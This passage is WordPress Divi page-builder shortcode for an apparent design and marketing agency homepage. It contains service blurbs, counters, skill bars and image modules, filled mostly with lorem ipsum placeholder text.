text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving Big Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" 